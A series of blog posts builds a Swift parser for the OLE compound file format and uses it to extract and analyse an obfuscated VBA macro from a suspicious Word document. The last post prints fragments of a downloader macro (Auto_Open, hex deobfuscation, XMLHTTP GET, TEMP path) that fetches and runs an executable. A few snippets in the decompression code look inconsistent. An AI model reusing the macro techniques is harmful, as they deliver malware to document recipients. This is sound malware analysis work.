Just An Application

November 23, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Eleven — The Grand Finale

Once we have a VBAModule we can get hold of the macro source like this.

    func getModuleSource(cf:CompoundFile, module:VBAModule) -> String?
    {
        let stream = cf.getStream(storage: ["Macros", "VBA"], name: module.streamName)
        let data   = stream?.data()
    
        if data == nil
        {
            return nil
        }
    
        let offset = Int(module.offset)
        let bytes  = data!.bytes
        let start  = bytes + offset
        let size   = Int(stream!.size) - offset
    
        let decompressor = VBADecompressor(bytes:start, nBytes:size)
    
        if let decompressed = decompressor.decompress()
        {
            return
                NSString(
                    bytes:
                        decompressed.bytes,
                    length:
                        decompressed.length,
                    encoding:
                        NSASCIIStringEncoding)
        }
        else
        {
            return nil
        }
    }

There is only one VBA module in this particular file.

It starts like this

    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Sub Auto_Open()

    ...

and ends with the canonical deobfuscation function.

    ...
    
    Public Function 'seekritFunction'(ByVal sData As String) As String
        Dim i       As Long
        For i = 1 To Len(sData) Step 2
        'seekritFunction' = 'seekritFunction' & Chr$(Val("&H" & Mid$(sData, i, 2)))
        Next i
    End Function

In between there is a lot of stuff like this

    ...
    
    GoTo lwaasqhrsst
    Dim gqtnmnpnrcr As String
    Open 'seekritFunction'("76627362776A7873756268") For Binary As #37555
    Put #37555, , gqtnmnpnrcr
    Close #37555
    lwaasqhrsst:
    Set kaakgrln = CreateObject('seekritFunction'("4D6963") + "ros" + "oft.XML" + "HTTP")

    GoTo gerkcnuiiuy
    Dim rqxnmbhnkoq As String
    Open 'seekritFunction'("757A76737169746D6D6370") For Binary As #29343
    Put #29343, , rqxnmbhnkoq
    Close #29343
    gerkcnuiiuy:
    claofpvn = Environ('seekritFunction'("54454D50"))

    GoTo vfvfbcuqpzg
    Dim vnklmvuptaq As String
    Open 'seekritFunction'("696F78686E716667726E6A") For Binary As #70201
    Put #70201, , vnklmvuptaq
    Close #70201
    vfvfbcuqpzg:
    kaakgrln.Open 'seekritFunction'("474554"), s8RX, False

    ...

which all looks very complicated until you realise that the first six lines of each block are a no-op.

There are approximately one hundred and fifty lines to start with of which about a half are ‘noise’.

What does it do ?

When the document is opened an executable (.exe) is downloaded from a hard-wired location and then run.

Thats it ? After all that ? ‘fraid so, a bit disappointing really isn’t it ? A spell-checker or something I expect. Very helpful of it really.

Still the Swift stuff was fun and the compound file stuff was ‘interesting’ !


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Ten — Records, Records And More Records

The result of decompressing the contents of the dir stream object is almost as incomprehensible as the compressed data.

It consists of a large number of records of which we want a grand total of two per module.

The records we are interested in are preceded by a large number of records we are not interested in. Most of these records have a length field so it is possible to ‘skip’ them, but some of them do not, so there is nothing for it but to brute force our way through to the ones we want.

The top-level method

    func parse() -> [VBAModule]?
    {
        informationRecord()
        projectReferences()
        return modules()
    }

is reasonably tidy, the others just consist of a lot of calls to a variety of methods for reading the different types of record, for example

    private func informationRecord()
    {
        readRecord(0x01)
        readRecord(0x02)
        readRecord(0x14)
        readRecord(0x03)
        readRecord(0x04)
        readRecordTwo(0x05)
        readRecordTwo(0x06)
        readRecord(0x07)
        readRecord(0x08)
        readRecordThree(0x09)
        readRecordTwo(0x0c)
    }

The end result should be an array of containing one or more instances of VBAModule.

    struct VBAModule
    {
        let streamName  : String
        let offset      : UInt32
    }

A VBAModule is simply two pieces of information

  • the name of the stream object that contains the module’s compressed source, and

  • the offset within the stream object at which the compressed data starts.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Nine — Decompression Time

The compressed data in the dir stream object should comprise a signature byte, which is always one, followed by one or more ‘chunk’s each of which represents 4096 bytes of uncompressed data.

Compressed data should always be at the end of a stream object so the end of the compressed data is indicated by reaching the end of the stream object.

On that basis we can process the compressed data like this

    func decompress() -> ByteData?
    {
        if dataIn[0] != 1
        {
            return nil
        }
        dataInCurrent = 1
        while dataInCurrent < dataInEnd
        {
            if !chunk()
            {
                return nil
            }
        }
        return makeByteData()
    }

where dataIn is the compressed data to be processed.

A chunk comprises a two byte header followed by at least one ‘token sequence’.

A chunk header comprises

  • a twelve bit size

  • a three bit signature, and

  • a one bit flag

The size specifies the number of bytes in the chunk minus three.

The signature is always three (0x03).

The flag is one if the chunk contains compressed data, and zero otherwise.

We can process a chunk of compressed data like this

    private func chunk() -> Bool
    {
        let chunkInStart = dataInCurrent
        let header       = getUnsignedInt16()
    
        dataInCurrent += 2
    
        let size        = Int(header & 0x0FFF) + 3
        let signature   = (header >> 12) & 0x07
        let flag        = (header & 0x8000) != 0
    
        if signature != 3
        {
            return false
        }
    
        chunkOutStart = dataOutCurrent
    
        let chunkInEnd = min(chunkInStart + size, dataInEnd)
        
        if flag
        {
            while dataInCurrent < chunkInEnd
            {
                if !tokenSequence(chunkInEnd)
                {
                    return false
                }
            }
            return true
        }
        else
        {
            // uncompressed data not supported
            return false
        }
    }

A token sequence comprises a ‘flags byte’ followed by either

  • eight ‘token’s if it is not the last one in a chunk, or

  • between one and eight ‘token’s otherwise.

The i‘th bit in the flag byte specifies the type of the i‘th token.

If the bit is zero the token is a one byte ‘literal token’ otherwise it is a two byte ‘copy token’

To obtain the uncompressed data represented by a token sequence we need to read the flag byte from the compressed data and then iterate over all the bits or until we reach the end of the compressed data.

In each iteration we need to handle either a literal or a copy token depending upon whether the bit is zero or one.

    func tokenSequence(chunkInEnd:Int) -> Bool
    {
        let flagsByte = Int(dataIn[dataInCurrent])
    
        dataInCurrent += 1
    
        if dataInCurrent < chunkInEnd
        {
            for i in 0 ..< 8
            {
                switch ((flagsByte >> i) & 1) == 1
                {
                    case false where (dataInCurrent + 1) <= chunkInEnd:
        
                        literalToken()
        
                    case true where (dataInCurrent + 2) <= chunkInEnd:
        
                        copyToken()
        
                    default:
        
                        return false
                }
                if dataInCurrent == chunkInEnd
                {
                    // end of chunk no more tokens
                    break
                }
            }
            return true
        }
        else
        {
            // must be at least one token
            return false
        }
    }

A literal token is a single byte of uncompressed data so we copy it from the compressed data to the decompressed data.

    private func literalToken()
    {
        dataOut.append(dataIn[dataInCurrent])
        ++compressedDataCurrent
        ++decompressedDataCurrent
    }

A copy token is a little-endian 16 bit unsigned integer interpreted as two unsigned integers.

The unsigned integer in the low-order bits denotes a ‘length’ and the unsigned integer in the high-order bits denotes an ‘offset’.

The size of ‘offset’ can vary between a minimum of four bits and a maximum of twelve bits, with the size of ‘length’ correspondingly varying between a maximum of twelve bits and a minimum of four bits .

The size of ‘offset’ when a copy token is processed is a function of the amount of decompressed data at that point.

It is the smallest number of bits, nBits, that can be used to represent the amount of decompressed data minus one, or four if nBits is less than four.

To obtain the uncompressed data represented by a copy token we first need to compute the size of ‘offset’ and hence ‘length’ and extract the values.

Given an unsigned 32 bit integer i we can compute the smallest number of bits needed to represent it by counting the number of leading zeros.

This is a very brute force approach

    private func numberOfLeadingZeros(i: UInt32) -> UInt
    {
        var n    : UInt   = 0
        var mask : UInt32 = 0x80000000
    
        while (mask != 0) && ((i & mask) == 0)
        {
            mask >>= 1
            ++n
        }
        return n
    }

and this is a slightly less brute force approach.

    private func numberOfLeadingZerosAlt(var i: UInt32) -> UInt
    {
        var s : UInt = 0
    
        if (i & 0xFFFF0000) != 0
        {
            i >>= 16
            s = 16
        }
        if (i & 0xFF00) != 0
        {
            i >>= 8
            s += 8
        }
        if (i & 0xF0) != 0
        {
            i >>= 4
            s += 4
        }
        if (i & 0x0C) != 0
        {
            i >>= 2
            s += 2
        }
        if (i & 0x03) != 0
        {
            i >>= 1
            s += 1
        }
        if (i & 0x01) != 0
        {
            s += 1
        }
        return 32 - s
    }

The computed ‘offset’ + 1 gives the offset back from the end of the decompressed data at which to start copying.

The computed ‘length’ + 3 gives the amount of data to copy.

The data to copy is appended to the end of decompressed data.

    private func copyToken()
    {
        let copyToken = getUnsignedInt16()
    
        dataInCurrent += 2
    
        let chunkOutSize = dataOutCurrent - chunkOutStart
        let nBits        = max(32 - numberOfLeadingZerosAlt(UInt32(chunkOutSize - 1)), 4)
        let lengthMask   = 0xFFFF >> nBits
        let length       = (copyToken & lengthMask) + 3
        let offsetMask   = ~lengthMask
        let offset       = ((copyToken & offsetMask) >> (16 - nBits)) + 1
        let source       = dataOutCurrent - offset
        
        for i in 0 ..< length
        {
            dataOut.append(dataOut)
        }
        dataOutCurrent += length
    }

And thats it.

We should now have the original data that was compressed and stored in the dir stream object.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 22, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Eight — What Is It We Are Looking For Again ?

Using a CompoundFile instance we can create a Stream instance for any stream object in the file as long as we know what it is called.

If we continue to assume that whatever this particular compound file does is being done by macros, then we need to know where they are stored in a ‘word’ document.

To find this out we need to consult a second specification pithily entitled

    [MS-WORD]: Word (.doc) Binary File Format

According to section 2.1.9 Macros Storage

The Macros storage is an optional storage that contains the macros for the file. If present, it MUST be a Project Root Storage as defined in [MS-OVBA] section 2.2.1.

Curiously every other section which describes storage explicitly specifies the name, for example.

The Custom XML Data storage is an optional storage whose name MUST be “MsoDataStore”.

Section 2.1.9 is the only one that does not so we will have to assume for the moment that its name is going to be

    "Macros"

or something of that ilk.

Moving on to specification number three

    [MS-OVBA]: Office VBA File Format Structure

as referenced from section 2.1.9 quoted above, section 2.2.1 Project Root Storage starts

A single root storage. MUST contain VBA Storage (section 2.2.2) and PROJECT Stream (section 2.2.7).

Going further down the rabbit hole we find section 2.2.2 VBA Storage

A storage that specifies VBA project and module information. MUST have the name “VBA” (case- insensitive). MUST contain _VBA_PROJECT Stream (section 2.3.4.1) and dir Stream (section 2.3.4.2). MUST contain a Module Stream (section 2.2.5) for each module in the VBA project.

Its not obvious from that where the actual code is but a quick look at section 2.2.5 tells us.

A stream (1) that specifies the source code of modules in the VBA project. The name of this stream is specified by MODULESTREAMNAME (section 2.3.4.2.3.2.3). MUST contain data as specified by Module Stream (section 2.3.4.3).

So thats where the source code is but the name of the stream is elsewhere it appears.

In fact the name is in a MODULESTREAMNAME record which is in a MODULE record which is in PROJECTMODULES record which is in the “dir” stream.

In the face of all that its tempting to just guess which stream it must be. There can’t be that many of them can there ?

Assuming we can find it, what’s in it ?

A module stream, it turns out, contains a variable length record followed by the compressed source code, so even if we guess which stream it is not going to do us much good.

The length of the first variable length record is defined in a MODULEOFFSET record which is also contained within a MODULE record and so on and so forth.

There is nothing for it we are going to have to get hold of the “dir” stream.

We are looking for a stream named “dir” within a storage object which is definitely named “VBA” or “vba” or “VbA” or something like that, which is within a storage object which might be called “Macros”, maybe.

Trying

    let cff       = CompoundFileFactory()
    let cf        = cff.open(argv[1])
    let dirStream = cf?.getStream(storage: ["Macros", "VBA"], name: "dir")
    let data      = dirStream?.data()

results in a non nil value for data so we are nearly there.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 21, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Seven — Stream And Storage Objects

We can model the combination of a set of sectors and the associated file allocation table as a SectorSpace.

    protocol SectorSpace
    {
        func data(index:SectorIndex) -> ByteData?
    }

A SectorSpace is an object capable of returning the contents of a stream given the index of the first sector in that ‘space’.

There are two possible SectorSpaces in a compound file. The first represents the sectors in the file itself in combination with the FAT. The second represents the sectors in the mini stream in combination with the mini FAT.

We can implements the first straight away. We have a SectorSource for the sectors in the file and the FAT.

For the second we have the mini FAT but we do not have the sectors stored in the mini stream.

The mini stream is an internal stream stored in sectors in the file itself, so it can be constructed using the first SectorSpace which represents those sectors and the FAT.

To construct the mini stream we need to know the starting sector and the size. These are stored in the directory entry for the root storage object.

We can define them as properties in the class RootStorageEntry

    let miniStreamStart : SectorIndex
    let miniStreamSize  : StreamSize

We can make the mini stream sector space like this

    private func makeMiniStreamSpace(
                     rootStorageEntry:
                         RootStorageEntry,
                     miniFAT:
                         FileAllocationTable,
                     fileSpace:
                         SectorSpace) -> SectorSpace?
    {
        if let data = fileSpace.data(rootStorageEntry.miniStreamStart)
        {
            return
                MiniStreamSpace(
                    data:
                        data,
                    size:
                        rootStorageEntry.miniStreamSize,
                    fat:
                        miniFAT,
                    sectorSize:
                        CFBFFormat.MINI_SECTOR_SIZE)
        }
        else
        {
            return nil
        }
    }

Now we have our two sector spaces we can implement a stream factory that can create a stream object given the index of its first sector and its size.

The size below which a stream object is stored in the mini stream is defined by the miniStreamCutoffSize field in the header. This and
the two sector spaces is all the stream factory needs.

    final class StreamFactory
    {
        init(fileSpace:SectorSpace, miniStreamSpace:SectorSpace, miniStreamCutoffSize:StreamSize)
        {
            self.fileSpace            = fileSpace
            self.miniStreamSpace      = miniStreamSpace
            self.miniStreamCutoffSize = miniStreamCutoffSize
        }
    
        //
    
        func makeStream(entry:StreamEntry) -> Stream?
        {
            let size = entry.streamSize
    
            if size > miniStreamCutoffSize
            {
                return Stream(size:size, start: entry.startingSector, space: fileSpace)
            }
            else
            {
                return Stream(size:size, start: entry.startingSector, space: miniStreamSpace)
            }
        }
    
        //
    
        private let fileSpace               : SectorSpace
        private let miniStreamSpace         : SectorSpace
        private let miniStreamCutoffSize    : StreamSize
    }

Once we have the stream factory we can define a class which implements a storage object.

All it needs is the StorageEntry which represents the storage object in the directory so it can find the stream and storage objects it contains, and the stream factory so that it can create stream objects as necessary,

    final class Storage
    {
        init(entry:StorageEntry, streamFactory:StreamFactory)
        {
            self.entry          = entry
            self.streamFactory  = streamFactory
            self.storageTable   = [String: Storage]()
            self.streamTable    = [String: Stream]()
        }
    
        //
    
        func getStream(var path:[String], name:String) -> Stream?
        {
            if path.count != 0
            {
                return getStorage(path.removeAtIndex(0))?.getStream(path, name: name)
            }
            else
            {
                return getStream(name)
            }
        }
    
        func getStorage(storageName:String) -> Storage?
        {
            var storage = storageTable[storageName]
    
            if storage != nil
            {
                return storage
            }
    
            let storageEntry = entry.getStorageEntry(storageName)
    
            if storageEntry == nil
            {
                return nil
            }
            storage = Storage(entry: storageEntry!, streamFactory: streamFactory)
            storageTable[storageName] = storage
            return storage
        }
    
        func getStream(streamName:String) -> Stream?
        {
            var stream = streamTable[streamName]
    
            if stream == nil
            {
                let streamEntry = entry.getStreamEntry(streamName)
    
                if streamEntry == nil
                {
                    return nil
                }
                stream = streamFactory.makeStream(streamEntry!)
                streamTable[streamName] = stream
            }
            return stream
        }
    
        //
    
        private let entry           : StorageEntry
        private let streamFactory   : StreamFactory
        //
        private var storageTable    : [String: Storage]
        private var streamTable     : [String: Stream]
    }

We can define a CompoundFile as a very simple wrapper around the Storage instance which represents the root storage object.

    final class CompoundFile
    {
        init(rootStorage:Storage)
        {
            self.rootStorage = rootStorage
        }
    
        //
    
        func getStream(#storage:[String], name:String) -> Stream?
        {
            return rootStorage.getStream(storage, name:name)
        }
    
        //
    
        private let rootStorage: Storage
    }

Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Six — Where Is Everything ? The Directory Edition

Now we have the file allocation table we can also read ‘the directory’.

The directory is an internal stream containing an entry for each storage object and stream object in the compound file.

The first entry in the directory is always the entry for the root storage object.

The entries for all the storage and stream objects contained within a given storage object are linked together as a red-black tree. The containing storage object has a link to the root of that tree.

Each entry in the directory is represented by a DirectoryEntry which is 128 bytes long.

This means we can read the directory at the sector level rather the stream level as there are guaranteed to be a whole number of entries per sector.

The firstDirSector header field identifies the first sector of the directory internal stream and the nDirSectors header field specifies the number of sectors.

In a version three compound file the nDirSectors field is always zero so it is of no use whatsoever. We have no choice but to iterate over all the sectors in sequence.

    private func readDirectoryV3(
                     header:
                         FileHeader,
                     fat:
                         FileAllocationTable,
                     sectors:
                         SectorSource) -> RootStorageEntry?
    {
        if let sequence = fat.sequence(header.firstDirSector)
        {
            let builder = DirectoryBuilder()
    
            for sectorIndex in sequence
            {
                let sector = sectors.sector(sectorIndex)
    
                if sector == nil
                {
                    return nil
                }
    
                var entryBytes = sector!
    
                for i in 0 ..< CFBFFormat.V3_DIRECTORY_ENTRIES_PER_SECTOR
                {
                    if !builder.addEntry(entryBytes)
                    {
                        return nil
                    }
                    entryBytes += CFBFFormat.DIRECTORY_ENTRY_SIZE
                }
            }
            return builder.build()
        }
        else
        {
            return nil
        }
    }

The DirectoryBuilder is passed a pointer to the bytes for each DirectoryEntry in each sector of the directory.

Within the DirectoryBuilder we can use the ‘flat struct’ technique to ‘read’ the DirectoryEntry.

In this case the struct FlatDirectoryEntry looks like this

    struct FlatDirectoryEntry
    {
        struct Name
        {
            let name0   : EightBytes
            let name1   : EightBytes
            let name2   : EightBytes
            let name3   : EightBytes
            let name4   : EightBytes
            let name5   : EightBytes
            let name6   : EightBytes
            let name7   : EightBytes
        }
    
        let name            : Name          // 64 bytes
        let nameLength      : UInt16
        let type            : UInt8
        let colour          : UInt8
        let left            : UInt32
        let right           : UInt32
        let child           : UInt32
        let clsid           : CLSID
        let state           : UInt32
        let created         : EightBytes
        let modified        : EightBytes
        let startingSector  : UInt32
        let streamSize      : UInt64
    }

The name field can contain up to thirty-two little-endian UTF-16 characters including a terminating ‘null’ character.

It is possible to define a struct with thirty-two UInt16 fields but its not going to be much use without some additional effort so we settle for something that is the right length.

The nameLength field specifies the length of the name including the terminating ‘null’ character, in bytes for some reason.

The type field must be one of

  • 0x00 (Unknown/Unallocated)

  • 0x01 (Storage Object)

  • 0x02 (Stream Object)

  • 0x05 (Root Storage Object)

The colour field is the ‘colour’ of the entry in the red-black tree in which it appears.

The left and right fields give the indices of the left and right children of the entry, if any, in the red-black tree in which it appears.

The child field is only valid if the entry represents a storage object. It is the index of the entry at the root of the red-black tree of the entries for the storage objects and stream objects ‘contained’ within the storage object.

The startingSector and streamSize fields are only valid if the entry represents a stream object,
and they specify the first sector of the stream object and its total size.

We can ‘read’ the DirectoryEntry using the FlatDirectoryEntry struct like this.

    let flatEntry = UnsafePointer<FlatDirectoryEntry>(bytes).memory

We can represent the type of a DirectoryEntry using an enum with the appropriate raw values.

    enum ObjectType: UInt8
    {
        case Unknown     = 0
        case Storage     = 1
        case Stream      = 2
        case RootStorage = 5
    }

and then attempt to construct one with the value of the type field to see whether it is valid.

    let type      = ObjectType(rawValue:flatEntry.type)
    
    if type == nil
    {
        return nil
    }

We can check that the nameLength field is an even number and that it is within bounds.

    let nameLength = Int(flatEntry.nameLength)
    
    if ((nameLength & 1) != 0) || nameLength > CFBFFormat.DIRECTORY_ENTRY_MAX_NAME_LENGTH
    {
        return nil
    }

The easiest way to construct the name itself is to use the pointer to the bytes while remembering that an Unknown/Unallocated entry has no name.

    var n : String?

    if nameLength != 0
    {
        n = NSString(bytes:bytes, length:Int(nameLength - 2), encoding: NSUTF16LittleEndianStringEncoding)
    }
    else
    {
        n = ""
    }
    if n == nil
    {
        return nil
    }

    let name = n!

Now we have both a type and a name we can engage in some gratuitous switchery to check that they are both valid.

    private func ensure(index:Int, name:String, type:ObjectType) -> Bool
    {
        switch type
        {
            case .Unknown where index != 0 && name == "":
    
                return true
    
            case .Storage, .Stream where index != 0 && name != "":
    
                return true
    
            case .RootStorage where index == 0 && name == CFBFFormat.DIRECTORY_ROOT_ENTRY_NAME:
    
                return true
    
            default:
    
                return false
        }
    }

If all the entries are read successfully we can then call the DirectoryBuilder build method.

If successful the build method returns a RootStorageEntry object. This can be used to find any storage object or stream object in the compound file.


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 18, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Five — Where Is Everything ? The Much Smaller Sectors Edition

The size of the sectors in a compound file is a function of the version. In a version three compound file the sector size is 512 bytes. In a version four compound file the sector size is 4096 bytes.

If a compound file contains a large number of stream objects that are smaller than a sector, and/or whose last part only partially fills a sector than there can be a considerable amount of wasted space.

To help avoid this stream objects below a certain size may be stored as a series of much smaller 64 byte sectors instead.

These sectors are in turn stored as the contents of an internal stream called the ‘mini stream’. This stream has an associated file allocation table, the ‘mini FAT’.

The mini FAT like the FAT is stored in sectors. Unlike the FAT the sector index chain for the Mini FAT is stored in the FAT.

Having read the FAT we can now read the mini FAT.

The starting sector and the number of sectors are specified by the

    firstMiniFATSector

and

    nMiniFATSectors

fields in the header

We can read the mini FAT using readFAT since the structure of the mini FAT is identical to that of the FAT.

    private func readMiniFAT(
                     header:
                         FileHeader,
                     nEntriesPerSector:
                         Int,
                     fat:
                         FileAllocationTable,
                     sectors:
                         SectorSource) -> FileAllocationTable?
    {
        if let sequence = fat.sequence(header.firstMiniFATSector)
        {
            return
                readFAT(
                        header.nMiniFATSectors,
                    nEntriesPerSector:
                        nEntriesPerSector,
                    sequence:
                        sequence,
                    sectors:
                        sectors)
        }
        else
        {
            return nil
        }
    }

Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 17, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Four — Where Is Everything ? Sectors Edition

Conceptually a compound file is a collection of

  • storage objects, and

  • stream objects.

arranged in a ‘tree’, plus internal streams which hold metadata.

A storage object is a named collection of stream objects and storage objects.

A stream object is a named sequence of bytes.

A compound file is considered to be a single storage object, the ‘root storage’ object, containing other storage objects and stream objects.

A storage object is a purely logical collection.

Storage objects do not exist as a separate entities unlike stream objects and stream objects ‘contained’ within a single storage object are not grouped together for example.

At the lowest level a compound file comprises a header and some number of fixed-length sectors.

Sectors are used to store the contents of stream objects and internal streams.

If a stream object or internal stream spans multiple sectors then those sectors may appear anywhere in the file in any order.

To access the contents of a stream object or internal stream it is necessary to know which sector contains the first part and which sectors contain the other parts and in what order.

Given the name of a stream object the starting sector can be determined using ‘the directory’ which is an internal stream.

Given the index of the sector which contains part of a stream object the index of the sector which contains the next part, if any, can be determined using the ‘file allocation table’ (FAT) which is another internal stream.

To access the contents of a given named stream object therefore it is first necessary to read the directory.

The directory is stored in one or more sectors so to read it, it is first necessary to have read the file allocation table to determine their whereabouts.

The file allocation table is also stored in one or more sectors. Fortunately we don’t have to have already read it in order to read it, because the sectors which comprise the file allocation table are specified by the ‘double-indirect file allocation table’ (DIFAT) which is another internal stream.

The first sector of the DIFAT is specified in the header and unlike all other sectors in a compound file the DIFAT sectors are chained together using information in the sectors themselves not the FAT.

In addition the first 109 entries in the DIFAT also appear in the header as the DIFAT field, which means that in some cases it may not be necessary to read the DIFAT sectors at all.

To read the file allocation table we must iterate over the entries in the DIFAT reading each of the specified sectors and concatenating the contents.

From this point on everything has to be accessed in terms of sectors so we can start by defining the SectorSource protocol.

    protocol SectorSource
    {
        var sectorSize : Int { get }
    
        func sector(index:SectorIndex) -> UnsafePointer<UInt8>?
    }

A SectorSource is an object capable of returning a sector given its index.

The SectorIndex type is defined like this

    typealias SectorIndex   = UInt32

The sectorSize property specifies the size of all sectors returned by a successful call to the sector method.

Given a SectorSource object for the sectors in the file and the sequence of sector indexes from the DIFAT we can read the FAT like this

     private func readFAT(
                      nSectors:
                          Int,
                      nEntriesPerSector:
                          Int,
                      sequence:
                          SectorIndexSequence,
                      sectors:
                          SectorSource) -> FileAllocationTable?
    {
        if nSectors == 1
        {
            var g = sequence.generate()
    
            if let sectorIndex = g.next()
            {
                return readSingleSectorFAT(sectorIndex, nEntries:nEntriesPerSector, sectors: sectors)
            }
            else
            {
                return nil
            }
        }
        else
        {
            return nil
        }
    }

It is especially easy in the case of this particular file since the entire FAT is contained in a single sector.

    private func readSingleSectorFAT(index:SectorIndex, nEntries:Int, sectors:SectorSource) -> FileAllocationTable?
    {
        if let sector = sectors.sector(index)
        {
            return SingleSectorFAT(bytes:sector, nEntries:nEntries)
        }
        else
        {
            return nil
        }
    }

The result is an object which implements the FileAllocationTable protocol.

    protocol FileAllocationTable
    {
        func next(index: SectorIndex) -> SectorIndex?
        
        func sequence(index:SectorIndex) -> SectorIndexSequence?
    }

Given a sector index the next method returns the index of the next sector as held in the file allocation table.

Given the index of the first sector of a stream object the sequence method will return the indices of all the sectors containing the stream object in order.

The SectorIndexSequence type is defined like this

    typealias SectorIndexSequence = SequenceOf<SectorIndex>

Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

November 16, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Three — Now Read Your Header

The 512 byte header of a compound file can be represented as a Swift struct like this

    struct FlatFileHeader
    {
        let signature               : EightBytes
        let clsid                   : CLSID
        //
        let minor                   : UInt16
        let major                   : UInt16
        let byteOrder               : UInt16
        let sectorShift             : UInt16
        let miniSectorShift         : UInt16
        let reserved                : SixBytes
        let nDirSectors             : UInt32
        let nFATSectors             : UInt32
        let firstDirSector          : UInt32
        let xactionSig              : UInt32
        let miniStreamCutoffSize    : UInt32
        let firstMiniFATSector      : UInt32
        let nMiniFATSectors         : UInt32
        let firstDIFATSector        : UInt32
        let nDIFATSectors           : UInt32
        let difat                   : DIFAT
    }

It is effectively a straight transcription from the specification with four exceptions

In the specification the first field is defined as

    Header Signature (8 bytes): ... 

the second field is defined as

    Header CLSID (16 bytes): ... 

the eighth field is defined as

    Reserved (6 bytes): ... 

and the last field is defined as

    DIFAT (436 bytes): ... 

In all these cases the field could be represented as

    [UInt8]

but that fails to capture the exact size of each field, so we do this instead.

We represent the ‘Header Signature’ using the struct EightBytes which looks something like this

    struct EightBytes
    {
        let b0 : UInt8
        let b1 : UInt8
        let b2 : UInt8
        let b3 : UInt8
        let b4 : UInt8
        let b5 : UInt8
        let b6 : UInt8
        let b7 : UInt8
    }

We represent the ‘Header CLSID’ using the struct CLSID which looks something like this

    struct CLSID
    {
        let first   : EightBytes
        let second  : EightBytes
    }

We represent the ‘Reserved’ field using the struct SixBytes which looks something like this

    struct SixBytes
    {
        let b0 : UInt8
        let b1 : UInt8
        let b2 : UInt8
        let b3 : UInt8
        let b4 : UInt8
        let b5 : UInt8
    }

The DIFAT field is not really 436 bytes but 109 32-bit integers which we can represent using the struct DIFAT which looks something like this

    struct DIFAT
    {
        let i0  : UInt32
        let i1  : UInt32
    }

At the moment it only represents the first two values but it can be ‘extended’ if necessary.

The result of using this seemingly random combination of rather odd structures is that the struct FlatFileHeader is indeed ‘flat’ which is to say that are all its fields are value types. They are in fact all structs.

Bearing in mind that the compound file format is little endian and so is this computer, and if we assume the Swift compiler

  1. represents the values of the UInt<N> types by the exact number of bytes necessary when the value is contained in a struct

  2. represents the fields in exactly the same order that they were defined and wihout padding,

  3. that it does the same recursively with the nested struct values, and

  4. that it ensures that the memory allocated for the struct at runtime is at least 4 byte aligned

then, not at all accidentally, the representation of the struct in memory would be identical to the representation of the header in the compound file, and vice-versa.

It is the vice-versa case which is of interest since it would imply that if we had an NSData object containing at least the
first 512 bytes of a compound file then we could ‘read’ the header like this

    let flatHeader = UnsafePointer<FlatFileHeader>(data.bytes).memory

This is not necessarily the piece of insane optimism that it might at first appear.

Given the seamless interworking between Swift and Objective-C it would make a great deal of sense if at runtime a Swift struct meeting the right criteria was identical to the equivalent Objective-C struct.

Running this

    ...
    
    let data = NSData(contentsOfFile:fileName)
    
    if data == nil
    {
        return
    }
    
    let nBytes = data!.length
    
    if nBytes < CFBFFormat.HEADER_SIZE
    {
        return
    }
        
    let flatHeader = UnsafePointer<FlatFileHeader>(data!.bytes).memory
            
    print("Signature:\t\t\t")
    for i in 0 ..< 8
    {
        print("\(flatHeader.signature[i]) ")
    }
    println()
    println("Major:\t\t\t\t\(flatHeader.major)")
    println("Minor:\t\t\t\t\(flatHeader.minor)")
    println("Byte order:\t\t\t\(flatHeader.byteOrder)")
    println("Sector shift:\t\t\(flatHeader.sectorShift)")
    println("MiniSector shift:\t\(flatHeader.miniSectorShift)")
    println("N dir sectors:\t\t\(flatHeader.nDirSectors)")
    println("N FAT sectors:\t\t\(flatHeader.nFATSectors)")
    println()
            
    ...

prints this

